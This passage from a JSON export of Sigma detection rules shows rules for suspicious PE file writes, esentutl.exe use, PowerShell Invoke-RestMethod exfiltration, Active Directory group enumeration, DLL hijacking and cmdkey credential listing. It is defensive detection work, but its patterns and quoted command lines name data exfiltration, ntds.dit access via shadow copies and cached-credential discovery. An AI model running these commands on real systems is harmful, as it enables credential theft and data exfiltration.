'?:\\Users\\\\*\\AppData\\Roaming\\SetupProd_Act.exe'\n\n exclusion_mtxagent:\n ProcessImage: '?:\\Program Files\\BMC Software\\Client Management\\Client\\bin\\mtxagent.exe'\n ProcessSigned: 'true'\n\n # Just for fun: process used by the Spanish police to identify\n # users via their electronic identity card\n exclusion_dnieservice:\n Path: '?:\\Users\\\\*\\AppData\\Local\\DNIeService.exe'\n ProcessCommandLine: '?:\\windows\\system32\\svchost.exe -k netsvcs -s CertPropSvc'\n\n exclusion_ProfSvc:\n Path: '?:\\Users\\\\*\\AppData\\Local\\{????????-????-????-????-????????????}.tmp'\n ProcessCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s ProfSvc'\n\n exclusion_msmpeng:\n ProcessOriginalFileName: 'MsMpEng.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows Publisher'\n\n exclusion_bomgar:\n ProcessImage|endswith:\n - '\\bomgar-scc.exe'\n - '\\sra-scc.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Bomgar Corporation'\n - 'BeyondTrust Corporation'\n Path:\n - '?:\\ProgramData\\Z@S!-????????-????-????-????-????????????.tmp'\n - '?:\\ProgramData\\btsccoi-????????????????????????????????.exe'\n\n exclusion_bomgar_install:\n ProcessImage|endswith: '\\nstvstub.exe'\n ProcessCommandLine|contains|all:\n - ' --install '\n - ' --hwnd '\n Path: '?:\\ProgramData\\Z@S!-????????-????-????-????-????????????.tmp'\n\n exclusion_office_deployment_tool:\n ProcessImage|endswith: '\\officedeploymenttool_*.exe'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_mssense:\n ProcessImage: '?:\\Program Files\\Windows Defender Advanced Threat Protection\\MsSense.exe'\n ProcessSignature: 'Microsoft Windows Publisher'\n\n exclusion_autobackup:\n ProcessOriginalFileName: 'AutoBackup?Pro.exe'\n ProcessSignature: 'Fabrice PARISOT'\n\n exclusion_tsplus:\n ProcessImage:\n - '?:\\Program Files\\TSplus\\UserDesktop\\files\\svcr.exe'\n - '?:\\Program Files (x86)\\TSplus\\UserDesktop\\files\\svcr.exe'\n ProcessSignature: 'Remote Access World SAS'\n\n exclusion_installshield:\n ProcessImage:\n - '?:\\Program Files\\Common Files\\InstallShield\\Engine\\\\*\\Intel*\\IKernel.exe'\n - '?:\\Program Files (x86)\\Common Files\\InstallShield\\Engine\\\\*\\Intel*\\IKernel.exe'\n\n exclusion_fastviewer:\n ProcessSigned: 'true'\n ProcessSignature: 'FastViewer GmbH'\n Path: '?:\\Users\\\\*\\Music\\exe\\\\*.tmp'\n\n exclusion_hp:\n ProcessImage: '?:\\Windows\\System32\\msiexec.exe'\n Path: '?:\\Users\\\\*\\AppData\\Roaming\\SecondaryApp.exe'\n\n exclusion_hp_devicestup:\n ProcessImage: '?:\\Program Files\\HP\\HP * series\\Bin\\DeviceSetup.exe'\n Path: '?:\\Users\\\\*\\AppData\\Local\\Full_Webpack-* _Full_Webpack.exe'\n\n exclusion_msiexec:\n ProcessImage: '?:\\Windows\\System32\\msiexec.exe'\n Path|startswith: '?:\\Windows\\INF\\'\n\n exclusion_installer:\n ProcessImage: '?:\\Users\\\\*\\AppData\\Local\\Temp\\7z*\\setup.exe'\n Path:\n - '?:\\Users\\\\*\\AppData\\Local\\\\*.dll'\n - '?:\\Users\\\\*\\AppData\\Local\\\\*.exe'\n\n exclusion_eraser:\n ProcessImage|endswith: '\\Eraser.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Rare Ideas, LLC'\n Path: '?:\\ProgramData\\\\*.dll'\n\n exclusion_svchost:\n ProcessImage: '?:\\Windows\\System32\\svchost.exe'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n Path|endswith: '\\{????????-????-????-????-????????????}.tmp'\n\n # Behringer X-USB\n exclusion_behringer:\n ProcessImage:\n - '?:\\Windows\\System32\\svchost.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Temp\\ns?????.tmp\\ns?????.tmp'\n Path:\n - '?:\\ProgramData\\CNE???.tmp'\n - '?:\\ProgramData\\CNE????.tmp'\n\n # LANDesk® Management Suite\n exclusion_landesk:\n ProcessImage:\n - '?:\\Windows\\Temp\\inst32.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Temp\\inst32.exe'\n ProcessDescription: 'INSTALL MFC Application'\n Path: '?:\\Windows\\Fonts\\zch????.tmp'\n\n exclusion_phpstorm:\n ProcessImage|endswith: '\\PhpStorm-????.?.?.exe'\n ProcessDescription: 'PhpStorm Windows Installer'\n Path|endswith: '\\PhpStorm????.?_*_Uninstall.exe'\n\n exclusion_proxynetworks:\n ProcessImage|endswith: '\\PhSvc.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Proxy Networks Inc.'\n Path: '?:\\ProgramData\\PHodCln-{????????-????-????-????-????????????}.exe'\n\n exclusion_magic:\n ProcessImage:\n - '?:\\Program Files\\MagicUtilities\\MagicMouseUtilities.exe'\n - '?:\\Program Files\\MagicUtilities\\MagicTrackpadUtilities.exe'\n - '?:\\Program Files\\MagicUtilities\\MagicKeyboardUtilities.exe'\n Path: '?:\\ProgramData\\fnebeqbh.fxh'\n\n exclusion_image:\n ProcessImage:\n - '?:\\Windows\\System32\\Robocopy.exe'\n - '?:\\Program Files\\7-Zip\\7zG.exe'\n\n condition: selection and 1 of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "118fe9fa-f27d-4da6-bee4-85f73fe9c76c", "rule_name": "PE File Written in Suspicious Location", "rule_description": "Detects the writing of a Portable Executable file in a suspicious location.\nAttacker can drop DLLs or PEs in unconventionnal directories to prevent security softwares or users seeing them.\nIt is recommended to analyze the dropped file for malicious content.\n", "rule_creation_date": "2023-07-10", "rule_modified_date": "2025-11-26", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion" ], "rule_technique_tags": [ "attack.t1036", "attack.t1564" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "11f7107e-28d1-4486-afca-4379b68744b3", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "medium", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.627287Z", "creation_date": "2026-03-23T11:45:34.627289Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.627293Z", "rule_level": "medium", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://lolbas-project.github.io/lolbas/Binaries/Esentutl/", "https://attack.mitre.org/techniques/T1218/", "https://attack.mitre.org/techniques/T1564/004/", "https://attack.mitre.org/techniques/T1570/", "https://attack.mitre.org/techniques/T1105/", "https://attack.mitre.org/software/S0404/" ], "name": "t1218_esentutl.yml", "content": "title: Esentutl.exe Execution\nid: 11f7107e-28d1-4486-afca-4379b68744b3\ndescription: |\n Detects the execution of esentutl.exe, a legitimate Windows database utility.\n Adversaries may misuse this tool to manipulate files, access sensitive data, or disable security measures.\n It is recommended to investigate the legitimacy of the esentutl.exe execution and review file accesses.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Esentutl/\n - https://attack.mitre.org/techniques/T1218/\n - https://attack.mitre.org/techniques/T1564/004/\n - https://attack.mitre.org/techniques/T1570/\n - https://attack.mitre.org/techniques/T1105/\n - https://attack.mitre.org/software/S0404/\ndate: 2021/07/09\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - attack.t1564.004\n - attack.lateral_movement\n - attack.t1570\n - attack.command_and_control\n - attack.t1105\n - attack.s0404\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Esentutl\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Deletion\n - classification.Windows.Behavior.FileDownload\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - Image|endswith: '\\esentutl.exe'\n - OriginalFileName: 'esentutl.exe'\n\n # This is handled by the rule 8610a64e-eb0f-436c-b21d-33f757ea41f0\n filter_vss:\n CommandLine|contains|all:\n - ' /y '\n - ' /vss '\n\n exclusion_parentimage:\n ParentImage:\n - '?:\\Program Files\\Veritas\\NetBackup\\bin\\bpbkar32.exe'\n - '?:\\ProgramData\\Cyvera\\LocalSystem\\Download\\protected_payload_execution\\cortex-xdr-payload.exe'\n - '?:\\Program Files\\HDCleaner\\HDCleaner.exe'\n - '?:\\Program Files\\Magnet Forensics\\Magnet AXIOM\\AXIOM Process\\AXIOMProcess.exe'\n - '?:\\Program Files\\Symantec\\Backup Exec\\beremote.exe'\n\n exclusion_commandline:\n CommandLine:\n - 'esentutl.exe'\n - 'esentutl /g'\n - 'esentutl.exe /d ?:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Windows.edb'\n\n exclusion_arcserve_backup:\n ParentImage: '?:\\Program Files\\CA\\SharedComponents\\ARCserve Backup\\UniAgent\\caagstart.exe'\n # C:\\Windows\\system32\\esentutl /K \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy89\\Windows\\NTDS\\edb06C20.log\n # C:\\Windows\\system32\\esentutl /K \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy103\\Windows\\NTDS\\ntds.dit\n CommandLine:\n - '?:\\Windows\\system32\\esentutl /K *\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy*\\Windows\\NTDS\\edb*.log'\n - '?:\\Windows\\system32\\esentutl /K *\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy*\\Windows\\NTDS\\ntds.dit'\n\n # Microsoft File Replication Service\n exclusion_ntrfs:\n ParentImage: '?:\\Windows\\System32\\ntfrs.exe'\n CommandLine: 'esentutl /d ?:\\windows\\ntfrs\\jet\\ntfrs.jdb'\n\n exclusion_edblog:\n CommandLine:\n - '?:\\Windows\\system32\\esentutl.exe /? edb.log'\n - '?:\\Windows\\system32\\esentutl.exe /?? edb.log'\n\n exclusion_veritas_backup:\n ParentImage: '?:\\Program Files\\Veritas\\Backup Exec\\raws\\beremote.exe'\n GrandparentImage: '?:\\Windows\\System32\\services.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "11f7107e-28d1-4486-afca-4379b68744b3", "rule_name": "Esentutl.exe Execution", "rule_description": "Detects the execution of esentutl.exe, a legitimate Windows database utility.\nAdversaries may misuse this tool to manipulate files, access sensitive data, or disable security measures.\nIt is recommended to investigate the legitimacy of the esentutl.exe execution and review file accesses.\n", "rule_creation_date": "2021-07-09", "rule_modified_date": "2026-02-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.command_and_control", "attack.defense_evasion", "attack.lateral_movement" ], "rule_technique_tags": [ "attack.t1105", "attack.t1218", "attack.t1564.004", "attack.t1570" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "12043ba4-4c8f-42df-8036-1677ede6fb84", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.623724Z", "creation_date": "2026-03-23T11:45:34.623727Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.623731Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://cert.pl/uploads/docs/CERT_Polska_Energy_Sector_Incident_Report_2025.pdf", "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-restmethod?view=powershell-7.5", "https://attack.mitre.org/techniques/T1059/001/", "https://attack.mitre.org/techniques/T1567/" ], "name": "t1059_001_data_exfiltration_invoke_restmethod.yml", "content": "title: Data Exfiltration via Invoke-RestMethod\nid: 12043ba4-4c8f-42df-8036-1677ede6fb84\ndescription: |\n Detects attempts to exfiltrate data via PowerShell using the Invoke-RestMethod cmdlet with an HTTP POST to an external server.\n Attackers can use this command to exfiltrate sensitive data, as was observed in the attack against the energy sector in Poland in 2025.\n It is recommended to investigate the context surrounding this command and verify the legitimacy of the remote server involved in the request.\nreferences:\n - https://cert.pl/uploads/docs/CERT_Polska_Energy_Sector_Incident_Report_2025.pdf\n - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-restmethod?view=powershell-7.5\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/techniques/T1567/\ndate: 2026/01/30\nmodified: 2026/03/17\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.exfiltration\n - attack.t1567\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.Exfiltration\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains|all:\n - 'Invoke-RestMethod '\n - ' -Ur' # -Uri\n - ' -Me' # -Method\n - ' -I' # -InFile\n - ' POST'\n ScriptNumberOfLines: 1\n\n filter_script:\n PowershellScriptPath|contains: '?'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "12043ba4-4c8f-42df-8036-1677ede6fb84", "rule_name": "Data Exfiltration via Invoke-RestMethod", "rule_description": "Detects attempts to exfiltrate data via PowerShell using the Invoke-RestMethod cmdlet with an HTTP POST to an external server.\nAttackers can use this command to exfiltrate sensitive data, as was observed in the attack against the energy sector in Poland in 2025.\nIt is recommended to investigate the context surrounding this command and verify the legitimacy of the remote server involved in the request.\n", "rule_creation_date": "2026-01-30", "rule_modified_date": "2026-03-17", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.execution", "attack.exfiltration" ], "rule_technique_tags": [ "attack.t1059.001", "attack.t1567" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "12345a32-eabd-4124-ad05-d724d29e4fd1", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "medium", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.083577Z", "creation_date": "2026-03-23T11:45:34.083580Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.083584Z", "rule_level": "medium", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://ericazelic.medium.com/ldap-queries-for-offensive-and-defensive-operations-4b035b816814", "https://blog.talosintelligence.com/emerging-interlock-ransomware/", "https://attack.mitre.org/techniques/T1069/002/" ], "name": "t1069_002_domain_group_discovered_powershell.yml", "content": "title: Domain Group Discovered via PowerShell\nid: 12345a32-eabd-4124-ad05-d724d29e4fd1\ndescription: |\n Detects the use of PowerShell to enumerate Active Directory groups.\n This may indicate reconnaissance activity aimed at identifying privileged, sensitive, or role-based groups.\n It is recommended to analyze the parent process as well as other commands executed in the same PowerShell session to look for malicious content or actions.\nreferences:\n - https://ericazelic.medium.com/ldap-queries-for-offensive-and-defensive-operations-4b035b816814\n - https://blog.talosintelligence.com/emerging-interlock-ransomware/\n - https://attack.mitre.org/techniques/T1069/002/\ndate: 2025/07/09\nmodified: 2025/08/06\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1069.002\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains|all:\n - '[adsisearcher]'\n - 'objectCategory=group'\n - '.PropertiesToLoad.Add('\n - '.findAll()'\n\n filter_script:\n PowershellScriptPath|contains: '?'\n\n condition: selection and not 1 of filter_*\nlevel: medium\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "12345a32-eabd-4124-ad05-d724d29e4fd1", "rule_name": "Domain Group Discovered via PowerShell", "rule_description": "Detects the use of PowerShell to enumerate Active Directory groups.\nThis may indicate reconnaissance activity aimed at identifying privileged, sensitive, or role-based groups.\nIt is recommended to analyze the parent process as well as other commands executed in the same PowerShell session to look for malicious content or actions.\n", "rule_creation_date": "2025-07-09", "rule_modified_date": "2025-08-06", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.discovery" ], "rule_technique_tags": [ "attack.t1069.002" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "12abc941-fc36-4c0f-97cf-0f380e889982", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.099100Z", "creation_date": "2026-03-23T11:45:34.099102Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.099106Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://www.trendmicro.com/en_us/research/22/k/earth-preta-spear-phishing-governments-worldwide.html", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_setup.yml", "content": "title: DLL Hijacking via Setup.exe\nid: 12abc941-fc36-4c0f-97cf-0f380e889982\ndescription: |\n Detects potential Windows DLL Hijacking via Visual Studio Setup.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://www.trendmicro.com/en_us/research/22/k/earth-preta-spear-phishing-governments-worldwide.html\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/12/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'Setup.exe'\n ProcessSignature: 'Microsoft Corporation'\n ImageLoaded|endswith: '\\dlmgr.dll'\n filter_legitimate_image:\n - Image|startswith:\n - '?:\\Program Files (x86)\\Microsoft Visual Studio*\\'\n - '?:\\Program Files\\Microsoft Visual Studio*\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n - ProcessParentImage|startswith:\n - '?:\\Program Files (x86)\\Microsoft Visual Studio*\\'\n - '?:\\Program Files\\Microsoft Visual Studio*\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files (x86)\\Microsoft Visual Studio*\\'\n - '?:\\Program Files\\Microsoft Visual Studio*\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Corporation'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "12abc941-fc36-4c0f-97cf-0f380e889982", "rule_name": "DLL Hijacking via Setup.exe", "rule_description": "Detects potential Windows DLL Hijacking via Visual Studio Setup.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2022-12-15", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "12d65b1e-e1ac-4617-86a9-eda02d5297ad", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "low", "rule_effective_confidence": "moderate", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.094687Z", "creation_date": "2026-03-23T11:45:34.094689Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.094693Z", "rule_level": "low", "rule_confidence": "moderate", "rule_confidence_override": null, "references": [ "https://attack.mitre.org/techniques/T1069/001/", "https://attack.mitre.org/techniques/T1033/" ], "name": "t1033_groups_macos.yml", "content": "title: Groups Listed via Groups\nid: 12d65b1e-e1ac-4617-86a9-eda02d5297ad\ndescription: |\n Detects the execution of the groups command.\n Attackers may use it during the discovery phase of an attack to enumerate the groups which a user belongs to.\n It is recommended to check for other suspicious activities by the parent process and to correlate this alert with any other discovery activity to determine legitimacy.\n If this activity is recurrent in your environment and legitimate, it is highly recommended to whitelist it.\nreferences:\n - https://attack.mitre.org/techniques/T1069/001/\n - https://attack.mitre.org/techniques/T1033/\ndate: 2022/11/14\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1069.001\n - attack.t1033\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Discovery\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image: '/usr/bin/groups'\n\n exclusion_jamf:\n - ProcessAncestors|contains: '/usr/local/jamf/bin/jamf'\n - ProcessParentCommandLine|contains: '/Library/Application Support/JAMF/tmp/'\n\n exclusion_common_folder:\n - ProcessGrandparentImage|startswith:\n - '/Applications/*/Contents/Resources/'\n - '/Applications/*/Contents/MacOS/'\n - '/Library/Application Support/'\n - '/opt/homebrew/'\n - '/Library/PrivilegedHelperTools/'\n - ProcessParentImage|startswith:\n - '/Applications/*/Contents/Resources/'\n - '/Applications/*/Contents/MacOS/'\n - '/Library/Application Support/'\n - '/opt/homebrew/'\n - '/Library/PrivilegedHelperTools/'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: moderate\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "12d65b1e-e1ac-4617-86a9-eda02d5297ad", "rule_name": "Groups Listed via Groups", "rule_description": "Detects the execution of the groups command.\nAttackers may use it during the discovery phase of an attack to enumerate the groups which a user belongs to.\nIt is recommended to check for other suspicious activities by the parent process and to correlate this alert with any other discovery activity to determine legitimacy.\nIf this activity is recurrent in your environment and legitimate, it is highly recommended to whitelist it.\n", "rule_creation_date": "2022-11-14", "rule_modified_date": "2025-04-14", "rule_os": "macos", "rule_status": null, "rule_tactic_tags": [ "attack.discovery" ], "rule_technique_tags": [ "attack.t1033", "attack.t1069.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "12fbe22c-6804-46a4-9668-d8c5dca77830", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "medium", "rule_effective_confidence": "moderate", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.605747Z", "creation_date": "2026-03-23T11:45:34.605750Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.605757Z", "rule_level": "medium", "rule_confidence": "moderate", "rule_confidence_override": null, "references": [ "https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/", "https://lolbas-project.github.io/lolbas/Binaries/Cmdkey/", "https://attack.mitre.org/techniques/T1087/", "https://attack.mitre.org/techniques/T1078/", "https://attack.mitre.org/techniques/T1552/" ], "name": "t1087_account_credentials_cmdkey.yml", "content": "title: Account Credentials Discovered via cmdkey.exe\nid: 12fbe22c-6804-46a4-9668-d8c5dca77830\ndescription: |\n Detects the execution of cmdkey.\n Attackers can use cmdkey to list system cached credentials, which can potentially be used for privilege escalation.\n Cmdkey can also be used to add or delete credentials to/from the cache.\n It is recommended to investigate the parent process for other suspicious actions.\nreferences:\n - https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/\n - https://lolbas-project.github.io/lolbas/Binaries/Cmdkey/\n - https://attack.mitre.org/techniques/T1087/\n - https://attack.mitre.org/techniques/T1078/\n - https://attack.mitre.org/techniques/T1552/\ndate: 2022/12/02\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1552\n - attack.discovery\n - attack.t1087\n - attack.initial_access\n - attack.t1078\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Cmdkey\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\cmdkey.exe'\n - OriginalFileName: 'cmdkey.exe'\n\n selection_cmdline:\n CommandLine|contains:\n - '/list'\n - '-list'\n\n exclusion_fiducial:\n ParentImage|endswith: '\\fermage.exe'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "12fbe22c-6804-46a4-9668-d8c5dca77830", "rule_name": "Account Credentials Discovered via cmdkey.exe", "rule_description": "Detects the execution of cmdkey.\nAttackers can use cmdkey to list system cached credentials, which can potentially be used for privilege escalation.\nCmdkey can also be used to add or delete credentials to/from the cache.\nIt is recommended to investigate the parent process for other suspicious actions.\n", "rule_creation_date": "2022-12-02", "rule_modified_date": "2025-01-28", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.discovery", "attack.initial_access", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1078", "attack.t1087", "attack.t1552" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "13135882-44de-4952-9602-946619060e2e", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", 